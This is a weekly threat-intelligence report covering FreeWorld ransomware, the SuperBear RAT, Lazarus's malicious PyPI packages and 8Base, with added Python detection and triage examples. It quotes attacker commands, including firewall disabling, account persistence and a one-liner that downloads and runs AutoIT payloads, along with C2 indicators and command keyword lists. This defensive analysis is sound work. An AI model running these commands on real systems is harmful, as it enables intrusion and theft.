Weekly Intelligence Report – 08 Sep 2023

Published On : 2023-09-07

Ransomware of the Week

The CYFIRMA Research and Advisory Team would like to highlight ransomware trends and insights gathered while monitoring various forums. These span multiple industries, geographies, and technologies, and could be relevant to your organization.

Type: Ransomware.
Target Technologies: MS Windows.

Introduction
CYFIRMA Research and Advisory Team has found ransomware known as FreeWorld while monitoring various underground forums as part of our Threat Discovery Process.

FreeWorld:
FreeWorld is a recently emerged variant of Mimic ransomware.
Once executed, the ransomware encrypts files and appends “.FreeWorldEncryption” to their filenames. When this process is complete, a ransom note named “FreeWorld-Contact.txt” is created.

Screenshot of files encrypted by FreeWorld ransomware. (Source: Surface Web)

FreeWorld ransomware note. (Source: Surface Web)

Breakdown of Ransomware attack in recent campaign.

Initial Access
In a recent attack campaign, the attackers brute-forced MSSQL server logins. After authenticating, they immediately began enumerating the database, with a particular focus on locating other login credentials.

Execution
Subsequently, upon finding that the xp_cmdshell stored procedure was enabled, the attackers began executing shell commands on the host. This procedure should remain disabled unless it is explicitly needed.

Discovery
The enumeration process relied on a few basic commands, primarily wmic.exe, net.exe, and ipconfig.exe, each executed via xp_cmdshell.

Defense Evasion
Having confirmed the target system was a viable one, the attackers proceeded to impair its defences with a series of commands. They created three new users (Windows, adminv$, and mediaadmin$) and added them to the “Remote Desktop Users” and “Administrators” groups. To cope with different system languages, they issued the group-membership commands in multiple languages, which increased their chances of success and streamlined the rest of their activity.

The attackers took an aggressive approach by disabling the Windows Firewall entirely with the command “netsh firewall set opmode disable”, which spared them from having to check or manage the firewall state. With many of the system’s defences disabled, especially network protection and RDP authentication, the attackers turned to establishing persistence. They began connecting to a remote SMB share to transfer tools. Before doing so they disconnected various existing network shares; their motivation for this is unclear, since the action could disrupt running processes and alert administrators.

Persistence
The attackers executed these commands for each of the users mentioned above. Once the users and group memberships were in place, they ran the following commands to prevent password expiry and ensure the accounts were never forcibly logged off:

  • net accounts /maxpwage:unlimited
  • net accounts /forcelogoff:no

Command and Control
It became evident that the attackers preferred using RDP to connect to the victim’s machine. Later, they were observed using Ngrok proxy software. However, before proceeding, the attackers conducted an enumeration to assess the current state of the RDP environment.

Network share analysis
The network share provided the attacker with the capability to transfer files to and from the victim system and install malicious tools. Researchers observed that although many files had obscure and random names, their intended functions became evident through their usage patterns.

During this phase, researchers detected a shift in the attackers’ strategies. They moved away from executing commands via the xp_cmdshell method and began utilizing commands from an SMB-delivered binary known as svr.exe. This binary appeared to serve as a command and control payload for Cobalt Strike. The researchers observed the binary establishing DNS connections with gelsd[.]com.

Ngrok usage
The attackers tried to establish RDP persistence using Ngrok, a tool that can bypass firewalls by running a host service and providing a public IP and port for the attacker to connect to. They placed the Ngrok binary in C:\Windows\System32, renaming it to n.exe. An unsuccessful attempt was made to create a connection using the svr.exe command.

AnyDesk used as a RAT
The attackers, undeterred by previous setbacks, turned to the use of AnyDesk, a legitimate remote access software often abused by threat actors as a Remote Access Trojan (RAT) to deploy ransomware. They executed a batch file named “a2.bat” through the svr.exe process to download and run the AnyDesk installation. However, the batch file seemed to be set to self-delete, making it impossible to observe its contents.

Having established strong persistence, the attackers shifted their focus to lateral movement within the network. They downloaded an advanced port scanner utility and placed it in the desktop directory of the newly created user “windows”. In addition, they executed Mimikatz through a batch file called “start.bat”. This batch file first modified the registry to force clear-text credential storage (a WDigest downgrade attack), and then ran Mimikatz to dump credentials. The results were stored on the “windows” user’s desktop.

Ransomware:
The attackers deployed Mimic ransomware on the compromised host; FreeWorld is a variant of Mimic. Both abuse the legitimate file-search utility “Everything” to locate the files they encrypt.

First, they downloaded a file named “5000.exe” to the desktop and executed it. This dropper extracted a “7zip” binary and the “Everything” utility into a temporary folder, then used 7zip to open a password-protected archive named “everything64.dll”.

The actual ransomware binary, “dc.exe”, was then placed in a hidden folder and executed. It encrypted the files on the system and appended “.FreeWorldEncryption” to their names.

Once encryption was complete, it created a ransom note named “FreeWorld-Contact.txt” with instructions on how the victim could pay to recover their files.

Relevancy and Insights:

  • This ransomware specifically targets the widely used Windows Operating System, which is prevalent across numerous industries and organizations.
  • Calls to WMI: The ransomware is making calls to the Windows Management Instrumentation (WMI) framework. WMI is a powerful tool used by many legitimate applications and services, but it can also be exploited by malware to evade detection and gain access to sensitive information.
  • USB Bus Checks: The ransomware is actively monitoring and checking the USB bus for connected devices. This behaviour suggests that the ransomware may be attempting to propagate itself by spreading through removable media, such as USB drives. It could be searching for specific files or vulnerabilities on connected devices to further spread its malicious payload.
  • User Input Checks: The ransomware is also performing checks on user input. This behaviour implies that the ransomware may have the ability to interact with the user or receive commands in some way. It could be looking for specific inputs or triggers to initiate its encryption process or carry out other malicious activities. This behaviour indicates a level of sophistication and interactivity in the ransomware’s design.
  • Detect-Debug-Environment: Debugging environments are used by developers to analyze and troubleshoot software. Ransomware that can detect debug environments may have implemented techniques to evade or disable debugging tools.
  • Long sleep periods: The malware performs long sleep during execution, indicating that it may be designed to avoid detection or delay its actions on the compromised system.
  • Persistence: The ransomware exhibits persistence mechanisms to ensure its survival and ongoing malicious activities within the compromised environment. This could involve creating autostart entries or modifying system settings to maintain a foothold and facilitate future attacks.

ETLM assessment
CYFIRMA’s assessment, based on the information available, indicates that the FreeWorld ransomware could pose a serious threat to organizations that rely heavily on Microsoft SQL Server (MS SQL) for data storage. We will continue to monitor, and provide a more comprehensive assessment when further information becomes available.

Following are the TTPs based on the MITRE ATT&CK framework.

Sr. No  Tactics                        Techniques/Sub-Techniques
1       TA0001: Initial Access         T1091: Replication Through Removable Media
2       TA0002: Execution              T1059: Command and Scripting Interpreter
                                       T1129: Shared Modules
3       TA0003: Persistence            T1543.003: Create or Modify System Process: Windows Service
                                       T1546.012: Event Triggered Execution: Image File Execution Options Injection
                                       T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
                                       T1547.008: Boot or Logon Autostart Execution: LSASS Driver
4       TA0004: Privilege Escalation   T1055: Process Injection
                                       T1543.003: Create or Modify System Process: Windows Service
                                       T1546.012: Event Triggered Execution: Image File Execution Options Injection
                                       T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
                                       T1547.008: Boot or Logon Autostart Execution: LSASS Driver
5       TA0005: Defense Evasion        T1027: Obfuscated Files or Information
                                       T1027.002: Obfuscated Files or Information: Software Packing
                                       T1036: Masquerading
                                       T1055: Process Injection
                                       T1070.004: Indicator Removal: File Deletion
                                       T1222: File and Directory Permissions Modification
                                       T1497: Virtualization/Sandbox Evasion
                                       T1562.001: Impair Defenses: Disable or Modify Tools
6       TA0006: Credential Access      T1003: OS Credential Dumping
                                       T1056.001: Input Capture: Keylogging
7       TA0007: Discovery              T1012: Query Registry
                                       T1033: System Owner/User Discovery
                                       T1057: Process Discovery
                                       T1082: System Information Discovery
                                       T1083: File and Directory Discovery
                                       T1120: Peripheral Device Discovery
                                       T1497: Virtualization/Sandbox Evasion
                                       T1518.001: Software Discovery: Security Software Discovery
                                       T1614.001: System Location Discovery: System Language Discovery
8       TA0008: Lateral Movement       T1091: Replication Through Removable Media
9       TA0009: Collection             T1056.001: Input Capture: Keylogging
                                       T1005: Data from Local System
                                       T1185: Browser Session Hijacking
10      TA0010: Exfiltration           T1567: Exfiltration Over Web Service
11      TA0011: Command and Control    T1105: Ingress Tool Transfer
                                       T1572: Protocol Tunneling
                                       T1573.001: Encrypted Channel: Symmetric Cryptography
                                       T1219: Remote Access Software
12      TA0040: Impact                 T1486: Data Encrypted for Impact

Indicators of Compromise
Kindly refer to the IOCs section to exercise controls on your security systems.

Sigma Rule:
title: UAC Bypass via ICMLuaUtil
tags:
    - attack.defense_evasion
    - attack.privilege_escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\dllhost.exe'
        ParentCommandLine|contains:
            - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
            - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'
    filter:
        - Image|endswith: '\WerFault.exe'
        - OriginalFileName: 'WerFault.exe'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
(Source: Surface Web)
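To show how detection content like the Sigma rule above, and the xp_cmdshell activity described in the Initial Access through Persistence steps of the FreeWorld campaign, translate into matching logic, here is an added example (not CYFIRMA’s code and not the SigmaHQ engine). The first rule is the published rule transcribed into Python; the second is a constructed companion rule for commands run through xp_cmdshell, and it assumes that xp_cmdshell launches cmd.exe as a child of sqlservr.exe so that a process-creation event shows sqlservr.exe as ParentImage. All events are constructed samples, not real telemetry.

```python
"""Toy Sigma-style evaluator for process_creation events (added example)."""

# Rule 1: the report's Sigma rule. Rule 2: constructed rule for the MSSQL
# intrusion; assumes ParentImage is sqlservr.exe for xp_cmdshell-spawned cmd.exe.
RULES = [
    {
        "title": "UAC Bypass via ICMLuaUtil",
        "selection": {
            "ParentImage|endswith": r"\dllhost.exe",
            "ParentCommandLine|contains": [
                "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
                "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",
            ],
        },
        "filter": [  # list of maps = any-of (OR), as in Sigma
            {"Image|endswith": r"\WerFault.exe"},
            {"OriginalFileName": "WerFault.exe"},
        ],
    },
    {
        "title": "Defense evasion or persistence command spawned via MSSQL xp_cmdshell",
        "selection": {
            "ParentImage|endswith": r"\sqlservr.exe",
            "Image|endswith": r"\cmd.exe",
            "CommandLine|contains": [
                "net user", "net localgroup", "netsh firewall set opmode disable",
                "net accounts /maxpwage:unlimited", "net accounts /forcelogoff:no", "wmic",
            ],
        },
        "filter": None,
    },
]


def _field_matches(event: dict, key: str, expected) -> bool:
    """Evaluate one 'Field|modifier: value(s)' pair; a list of values is any-of.
    Sigma string matching is case-insensitive, so both sides are lower-cased."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    for exp in (expected if isinstance(expected, list) else [expected]):
        exp = str(exp).lower()
        if modifier == "endswith" and actual.endswith(exp):
            return True
        if modifier == "contains" and exp in actual:
            return True
        if modifier == "" and actual == exp:
            return True
    return False


def _map_matches(event: dict, spec: dict) -> bool:
    """Every key of a map must match (AND)."""
    return all(_field_matches(event, k, v) for k, v in spec.items())


def rule_matches(event: dict, rule: dict) -> bool:
    """condition: selection and not filter."""
    if not _map_matches(event, rule["selection"]):
        return False
    flt = rule["filter"]
    return not (flt and any(_map_matches(event, m) for m in flt))


def run_rules(events, rules=RULES):
    """Return (event index, rule title) for every rule that fires on each event."""
    return [(i, r["title"]) for i, ev in enumerate(events) for r in rules if rule_matches(ev, r)]


# Constructed process_creation events using Sigma's windows/process_creation field names.
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
DLLHOST = r"C:\Windows\System32\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\System32\dllhost.exe", "ParentCommandLine": DLLHOST,
     "CommandLine": "cmd.exe /c whoami"},                       # fires: UAC bypass
    {"Image": r"C:\Windows\System32\WerFault.exe", "OriginalFileName": "WerFault.exe",
     "ParentImage": r"C:\Windows\System32\dllhost.exe", "ParentCommandLine": DLLHOST,
     "CommandLine": "WerFault.exe -u -p 4242 -s 100"},          # crash reporter: excluded by filter
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": SQL, "ParentCommandLine": "sqlservr.exe",
     "CommandLine": "cmd.exe /c net user mediaadmin$ <REDACTED> /add"},   # fires: rule 2
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": SQL, "ParentCommandLine": "sqlservr.exe",
     "CommandLine": "cmd.exe /c netsh firewall set opmode disable"},      # fires: rule 2
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": SQL, "ParentCommandLine": "sqlservr.exe",
     "CommandLine": "cmd.exe /c dir C:\\backups"},              # admin use of xp_cmdshell: no hit
    {"Image": r"C:\Windows\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "CommandLine": "notepad.exe"},                              # benign
]

if __name__ == "__main__":
    for idx, title in run_rules(EVENTS):
        print(f"event {idx}: {title}")
```

The fifth event shows why the constructed rule keys on the specific commands from the campaign rather than on sqlservr.exe spawning cmd.exe alone: an environment that legitimately uses xp_cmdshell would otherwise drown the alert in noise, while an environment that has disabled it (the report’s recommendation) can afford the broader rule.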

STRATEGIC RECOMMENDATIONS

  • Implement competent security protocols and encryption, authentication, or access credentials configurations to access critical systems in your cloud and local environments.
  • Ensure that backups of critical systems are maintained which can be used to restore data in case a need arises.

MANAGEMENT RECOMMENDATIONS

  • A data breach prevention plan must be developed considering, (a) the type of data being managed by the company; (b) the remediation process; (c) where and how the data is stored; (d) if there is an obligation to notify the local authority.
  • Enable zero-trust architecture and multifactor authentication (MFA) to mitigate the compromise of credentials.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

TACTICAL RECOMMENDATIONS

  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Update all applications/software regularly with the latest versions and security patches alike.
  • Add the Sigma rules for threat detection and monitoring which will help to detect anomalies in log events, identify and monitor suspicious activities.

Trending Malware of the Week

Type: Remote Access Trojan (RAT)
Objective: Data theft, Espionage, and Remote Access
Target Organization: Civil Society Groups
Suspected Threat Actor: Kimsuky (aka APT43)

Active Malware of the Week
This week “SuperBear” is trending.

SuperBear

Researchers have uncovered a new and unique remote access trojan (RAT) called SuperBear RAT that has been identified in a malware campaign and specifically targets journalists. This malware is deployed using open-source AutoIT scripts, posing a significant security concern for media professionals.

Researchers received a targeted sample sent to a journalist, containing a lure to open the document. The journalist received an email from an activist, thinking it was from an organization member, but it contained a malicious .LNK document. When opened, it executed a malicious PowerShell command along with a legitimate DOCX file related to the organization. Further analysis by researchers revealed that after the initial compromise, an AutoIT script was used to perform process injection through process hollowing.

Attack Method
Upon execution of the .LNK file, a hidden PowerShell window was launched alongside a legitimate decoy document. The actor used obfuscation to load and execute a PowerShell command, which decoded a value into a VBS script saved to the user profile directory. The VBS script contained commands padded with “su” strings to evade file-based detection signatures. The payload delivery site was a compromised WordPress instance on a legitimate website. The following command then retrieved two payloads from that domain:

  • cmd /c mkdir c:\dbhg & cd /d c:\dbhg & copy c:\windows\system32\curl.exe dbhg.exe & dbhg -o Autoit3.exe https[:]//REDACTED[.]me/wp-content/solmir.pdb & dbhg -o MTdYFp.au3 https[:]//REDACTED[.]me/wp-content/solmir_1.pdb & Autoit3.exe MTdYFp.au3

Payloads

  • The AutoIT3 executable, delivered as “solmir.pdb” and renamed to Autoit3.exe; AutoIT3 is an open-source tool.
  • A compiled and packed AutoIT3 script, delivered as “solmir_1.pdb” and renamed to “MTdYFp.au3”.

AutoIT3 was executed with the compiled script as a parameter, leading to a process injection operation.

AutoIT process injection using process hollowing
The AutoIT script used in this campaign performs process hollowing through native Windows API calls. It creates a suspended instance of Explorer.exe with “CreateProcess”, unmaps the suspended process’s image with “NtUnmapViewOfSection”, writes the malicious code into the process with “VirtualAllocEx” and “WriteProcessMemory”, and then redirects execution and resumes the process with “SetThreadContext” and “ResumeThread”. The injected code connects to a C2 server at IP address 89[.]117[.]139[.]230 and domain hironchk[.]com. The RAT carries out one of three primary operations:

  • Exfiltrating process and system data.
  • Downloading and executing a shell command.
  • Downloading and running a DLL.

The default action for the C2 server instructs clients to exfiltrate system data. Additionally, the RAT can execute shell commands or download a malicious DLL onto the infected machine, with the DLL being named “SuperBear” if it can’t generate a random filename.

INSIGHTS

  • SuperBear RAT is a highly advanced and targeted threat that poses a significant risk to journalists. Its precision targeting, advanced techniques, and versatile capabilities highlight its formidable nature in the cybersecurity landscape. The default action of exfiltrating system data reflects thorough reconnaissance by the threat actors, underscoring the evolving sophistication of cyber threats, especially in their focused efforts on journalists.
  • SuperBear RAT employs a process hollowing technique, which is a sophisticated method to hide malicious activity within legitimate processes. This technique’s relevance lies in its ability to evade detection and analysis. Additionally, the RAT establishes a connection with a Command and Control (C2) server, which is significant for tracking and understanding the malware’s command structure.
  • Attribution for this campaign is tentatively linked to Kimsuky, based on similarities in the initial attack vector and code patterns observed across multiple campaigns. However, it’s important to highlight that there are no indications of infrastructure overlap with known Kimsuky clusters at this time. This unique attack vector represents a novel approach for Kimsuky, known for its previous use of open-source tools like Quasar RAT in their operations.

Indicators of Compromise
Kindly refer to the IOCs Section to exercise controls on your security systems.

STRATEGIC RECOMMENDATIONS

  • Incorporate Digital Risk Protection (DRP) as part of the overall security posture to proactively defend against impersonations and phishing attacks.
  • Upgrade to an email security solution that provides advanced phishing protection, business email compromise detection, internal email protection, and account compromise detection.
  • Deploy an Extended Detection and Response (XDR) solution as part of the organization’s layered security strategy that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.

MANAGEMENT RECOMMENDATIONS

  • Regularly reinforce awareness related to different cyberattacks using impersonated domains/spoofed webpages with end-users across the environment and emphasize the human weakness in mandatory information security training sessions.
  • Security Awareness training should be mandated for all company employees. The training should ensure that employees:
    • Avoid downloading and executing files from unverified sources. For example, be wary of Word and Excel documents sent from an unknown source or acquired from the Internet that prompt you to ‘Enable Macros’.
    • Always inspect the full URL before downloading files to ensure it matches the source (e.g., Microsoft Teams should come from a Microsoft domain).
    • Inspect file extensions. Do not trust the filetype logo alone. An executable file can be disguised as a PDF or office document.

TACTICAL RECOMMENDATIONS

  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Implementation of a robust email security appliance for protection against phishing emails which can be scanned and blocked for malicious attachments and links as they are the topmost attack vector for Ransomware.
  • Consider the following multi-layered protection program:
    • Anti-evasion technology that prevents advanced evasion techniques that use embedded files and malicious URLs.
    • Anti-phishing engines to prevent any type of phishing attack before it reaches users.
    • Antivirus software for emails to minimize the risk of being infected by malware through email.

Weekly Intelligence Trends/Advisory

Weekly Attack Type and Trends

Key Intelligence Signals:

  • Attack Type: Malware Implants, Ransomware Attacks, Vulnerabilities & Exploits, DDoS, Data Leaks.
  • Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gain.
  • Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
  • Ransomware – 8Base Ransomware | Malware – SuperBear
  • 8Base Ransomware – One of the ransomware groups.
  • Please refer to the trending malware advisory for details on the following:
    • Malware – SuperBear
  • Behaviour – Most of this malware uses phishing and social engineering techniques as its initial attack vector. Apart from these techniques, exploitation of vulnerabilities, defence evasion, and persistence tactics are being observed.

Threat Actor in Focus

Lazarus Group Behind Malicious Python Packages, Part of Supply Chain Attack

  • Threat Actors: Lazarus Group
  • Attack Type: Supply Chain
  • Objective: Unknown
  • Target Technology: Third-party software repository
  • Target Geographies: Unknown
  • Target Industries: Information Technology
  • Business Impact: Operational Disruption

Summary:
In a recent observation, the North Korean state-sponsored Advanced Persistent Threat group Lazarus was seen uploading malicious packages to the Python Package Index (PyPI) repository. Security researchers uncovered a malicious supply chain campaign involving the upload of two dozen malicious Python packages to PyPI. The campaign started in August, and the packages were removed from PyPI only after accumulating downloads.

The group disguised these packages as legitimate software, with one of them masquerading as a VMware vSphere connector module called vConnector. One of the malicious packages, named VMConnect, targeted IT professionals seeking virtualization tools and was downloaded 237 times. Two other packages, ‘ethter’ and ‘quantiumbase’, contained the same code and were downloaded 253 and 216 times, respectively. Researchers found additional packages linked to the same operation, such as ‘tablediter’ (736 downloads), ‘request-plus’ (43 downloads), and ‘requestspro’ (341 downloads). These packages attempted to pass as legitimate software by appending “plus” and “pro” suffixes to their names. The malicious packages closely resembled the legitimate ones in description and file structure, but contained modifications that executed a malicious function, collecting data from infected machines and sending it to the attacker’s command and control servers. The attackers employed various techniques to avoid detection, such as typosquatting and impersonation of legitimate packages. One example is the tablediter package, which closely resembled the popular prettytable tool but executed its malicious code only when used in a project, rather than during installation.

Relevancy & Insights:
PyPI stands as the primary repository for Python packages, serving as a crucial resource for software developers seeking foundational components for their projects. Regrettably, its widespread usage renders it an appealing target for threat actors aiming to compromise developers or their undertakings. Frequently, these malicious packages are introduced under the umbrella of useful tools or emulate well-known projects by subtly altering their names. Given the immense volume of package uploads, PyPI lacks the capacity to thoroughly inspect each submission. Consequently, it relies on user reports to identify and eliminate malicious files. Unfortunately, by the time these files are removed, they have often accrued several hundred downloads.
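The naming tricks described in the summary (appending “plus” or “pro”, near-identical spellings) can be screened for before a dependency is ever installed. The following is an added example, not code from CYFIRMA or from the researchers cited: a checker that normalizes package names per PEP 503 and compares each requirement against a constructed allow-list of well-known names. The allow-list, the suffix list and the sample requirements file are assumptions made for this example; only “requests”, “prettytable” and the malicious names come from the report.

```python
import difflib
import re

# Constructed allow-list for the example. requests and prettytable are the
# projects the report says were imitated; the rest are filler for comparison.
KNOWN_PACKAGES = ["requests", "prettytable", "urllib3", "numpy", "pyvmomi"]

# "plus" and "pro" are the suffixes named in the report; the others are
# common lure suffixes added here as an assumption.
LURE_SUFFIXES = ("-plus", "plus", "-pro", "pro", "-python", "python", "2", "3")


def normalize(name: str) -> str:
    """PEP 503 normalization: case-fold and collapse runs of '-', '_', '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def flag_package(name: str, known=KNOWN_PACKAGES, cutoff: float = 0.75):
    """Return (normalized name, reason, imitated package) or None if nothing looks off."""
    n = normalize(name)
    known_n = [normalize(k) for k in known]
    if n in known_n:
        return None                                  # exactly a known package
    # 1) A known name embedded in a longer one: 'requestspro' -> 'requests'.
    for k in known_n:
        if len(k) >= 6 and k in n:
            return (n, "embeds", k)
    # 2) Strip a lure suffix, then look for near-identical spellings
    #    ('request-plus' -> 'request' ~ 'requests', 'urllib' ~ 'urllib3').
    candidates = [n] + [n[: -len(s)].rstrip("-") for s in LURE_SUFFIXES if n.endswith(s)]
    for cand in candidates:
        close = difflib.get_close_matches(cand, known_n, n=1, cutoff=cutoff)
        if close:
            return (n, "lookalike", close[0])
    return None


def scan_requirements(text: str):
    """Flag suspicious names in requirements.txt-style content; version specs are ignored."""
    findings = []
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z0-9][A-Za-z0-9._-]*)", line)
        if not m:                                    # blank line or comment
            continue
        hit = flag_package(m.group(1))
        if hit:
            findings.append(hit)
    return findings


# Constructed requirements file mixing legitimate pins with names from the report.
SAMPLE_REQUIREMENTS = """\
# constructed sample, not a real project file
requests==2.31.0
numpy>=1.24
requestspro
request-plus>=1.0
tablediter
vmconnect
urllib
"""

if __name__ == "__main__":
    for name, reason, base in scan_requirements(SAMPLE_REQUIREMENTS):
        print(f"{name}: {reason} {base}")
```

Two of the report’s packages deliberately slip through: ‘tablediter’ shares only the fragment “table” with prettytable, which is below any sensible similarity threshold, and ‘vmconnect’ imitates a product name rather than an allow-listed package. Name screening catches the cheap lures; the rest needs an internal mirror with a curated allow-list and review of what a package actually does at import time.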

ETLM Assessment:
This incident is not a lone case of malicious code infiltrating PyPI packages to execute harmful actions. It represents another instance in a series of supply chain attacks, where malicious PyPI packages have been employed for malicious purposes in the past. This latest occurrence underscores the strong probability of future software supply chain attacks, similar to the VMConnect campaign. Software supply chain attacks have gained popularity among both cybercriminals and state-sponsored threat actors due to their potential for widespread impact and their inherent difficulty in detection.

Recommendations:

  • Stay updated on threat intelligence related to software supply chain attacks and the tactics used by threat actors. This information can help you proactively defend against emerging threats.
  • Develop an incident response plan specifically tailored to supply chain attacks. Ensure that the organization is prepared to respond swiftly and effectively if a compromised package is identified.

Indicators of Compromise
Kindly refer to the IOCs (Indicators of Compromise) Section to exercise controls on your security systems.

Major Geopolitical Developments in Cybersecurity

South African news site attack in conjunction with coverage of India during BRICS Summit
Daily Maverick; a South African news website, said that an Indian DDoS attack forced it to close the site off to the whole domain of India, in order to safeguard its operation. The alleged attack came a day after the portal had claimed that Indian Prime Minister Narendra Modi had delayed his arrival at Pretoria’s Waterkloof Air Force Base for the 2023 BRICS Summit until he would be greeted by Deputy President Paul Mashatile. The news outlet reported that Indian Prime Minister Narendra Modi would not get off the plane since South African President Cyril Ramaphosa would greet Chinese President Xi Jinping when he arrived for the summit, while no similar delegation was available to greet Modi. The news came paradoxically after Indian National security advisor Ajit Doval called for collective efforts to deal with challenges stemming from cyberspace at the Friends of BRICS meeting, a month prior.

Infamous Chisel malware used by Russian military intelligence as a combat support tool
The UK’s Ministry of Defence (MoD) has reviewed the recently exposed Infamous Chisel campaign against Ukrainian military targets. The MoD sees it as an instance of cyber operations used as combat support. The National Cyber Security Centre (NCSC) has published a report on a malware campaign targeting Android mobile devices used by the Ukrainian military, as reported earlier by CYFIRMA. The malware, referred to as ‘Infamous Chisel’, has been used by the Russian cyber threat group known as Sandworm, previously linked to the Russian military intelligence agency’s (GRU) Main Centre for Special Technologies (GTsST). The malware enables persistent access to compromised Android devices and the collation and exfiltration of data from them, including data from applications used by the Ukrainian military. Infamous Chisel has highly likely been used with the aim of stealing sensitive military information. This activity demonstrates Russia’s continued use of cyber capabilities to support the invasion of Ukraine.

Rise in Malware/Ransomware and Phishing

Petkus Brothers is Impacted by 8Base Ransomware

Attack Type: Ransomware
Target Industry: Household Durables
Target Geography: The United States of America
Ransomware: 8Base Ransomware
Objective: Data Theft, Data Encryption, Financial Gains
Business Impact: Financial Loss, Data Loss, Reputational Damage

Summary:
From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in the dark forum that a company from the United States of America, (www[.]petkusbrothers[.]com), was compromised by 8Base Ransomware. Petkus Brothers is California’s Sunroom, Room Addition, and Remodelling Specialists. The compromised information includes invoices, receipts, accounting records, personal data certificates, employment agreements, and various other sensitive documents.

The following screenshot was observed published on the dark web:


Source: Dark Web

Relevancy & Insights:

  • The 8Base group’s identity, methods, and motivations largely remain a mystery. However, based on its leak site and public accounts, along with the group’s communications, researchers think the group’s verbal style is quite similar to that of RansomHouse; a group that typically purchases already compromised data or works with data leak sites to extort victims. This has led to speculation that 8Base may be an offshoot of RansomHouse.
  • 8Base uses a variety of ransomware strains, including a variant known as Phobos. The group has customized Phobos by appending ‘.8base’ to their encrypted files, but the format of the entire appended portion remains the same as Phobos, which includes an ID section, an email address, and then the file extension. This suggests that 8Base is leveraging Ransomware-as-a-Service (RaaS) offerings, a common practice among ransomware groups.
  • Based on the 8Base ransomware victim list, the top 5 target countries are as follows:

ETLM Assessment:

It is CYFIRMA’s assessment that while not a lot is known about 8Base, given the significant targeting of US companies as compared to other countries, globally in such a small timeframe, we assess their target geography will remain the same in the near future, which as per our assessment as a RaaS operating model is likely to provide the largest profit margins. We will continue to monitor and provide a more comprehensive assessment in due course. Remember that no single measure can guarantee complete protection, so it’s essential to adopt a layered security approach. Regularly reviewing and updating your security measures is crucial as the threat landscape evolves.
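When triaging a host, the first question is usually which family produced the encrypted files, and the report gives two naming schemes for that: FreeWorld appends “.FreeWorldEncryption” and drops “FreeWorld-Contact.txt” (Ransomware of the Week, above), while 8Base keeps the Phobos layout of an ID section, an email address and then “.8base”. The following is an added example, not CYFIRMA’s tooling: a small classifier that parses a directory listing against both schemes. The concrete 8Base layout used (“<name>.id[<id>].[<email>].8base”) is an assumption modelled on the report’s description, and every ID, mailbox and filename in the sample listing is a constructed placeholder, not an indicator from the report.

```python
import re
from collections import Counter

# FreeWorld naming, as described in the report.
FREEWORLD_EXT = ".FreeWorldEncryption"
FREEWORLD_NOTE = "FreeWorld-Contact.txt"

# 8Base / Phobos-style naming: ID section, email, then ".8base". The exact
# bracket layout is an assumption for this example.
EIGHTBASE_RE = re.compile(
    r"^(?P<orig>.+)\.id\[(?P<id>[^\]]+)\]\.\[(?P<email>[^\]]+)\]\.8base$"
)


def classify(filename: str):
    """Return (family, details) for an encrypted filename, or None if it matches neither scheme."""
    if filename.endswith(FREEWORLD_EXT):
        return ("FreeWorld", {"original": filename[: -len(FREEWORLD_EXT)]})
    m = EIGHTBASE_RE.match(filename)
    if m:
        return ("8Base", {"original": m["orig"], "victim_id": m["id"], "contact": m["email"]})
    return None


def triage(listing):
    """Summarise a listing: per-family counts, contact mailboxes seen, ransom notes
    present, and files that matched neither scheme (possibly untouched or a third family)."""
    counts, contacts, notes, unmatched = Counter(), set(), [], []
    for name in listing:
        if name == FREEWORLD_NOTE:
            notes.append(name)
            continue
        hit = classify(name)
        if hit is None:
            unmatched.append(name)
            continue
        family, details = hit
        counts[family] += 1
        if "contact" in details:
            contacts.add(details["contact"])
    return {"counts": dict(counts), "contacts": sorted(contacts),
            "notes": notes, "unmatched": unmatched}


# Constructed listing; IDs and the mailbox are placeholders, not report indicators.
SAMPLE_LISTING = [
    "Q3-invoices.xlsx.FreeWorldEncryption",
    "contract.docx.FreeWorldEncryption",
    "FreeWorld-Contact.txt",
    "ledger.accdb.id[DEADBEEF-0001].[contact@example.invalid].8base",
    "payroll.pdf.id[DEADBEEF-0001].[contact@example.invalid].8base",
    "readme.md",
]

if __name__ == "__main__":
    print(triage(SAMPLE_LISTING))
```

The victim ID and contact mailbox recovered from 8Base-style names are worth recording in the incident timeline: the same values tend to recur across every file on a host, so a change in either between two hosts points to separate affiliate deployments rather than one spread.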

Vulnerabilities and Exploits

Vulnerability in Django

  • Attack Type: Vulnerabilities & Exploits
  • Target Technology: Content Management System
  • Vulnerability: CVE-2023-41164 (CVSS Base Score 7.5)
  • Vulnerability Type: Resource Exhaustion

Summary:
The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

Relevancy & Insight:
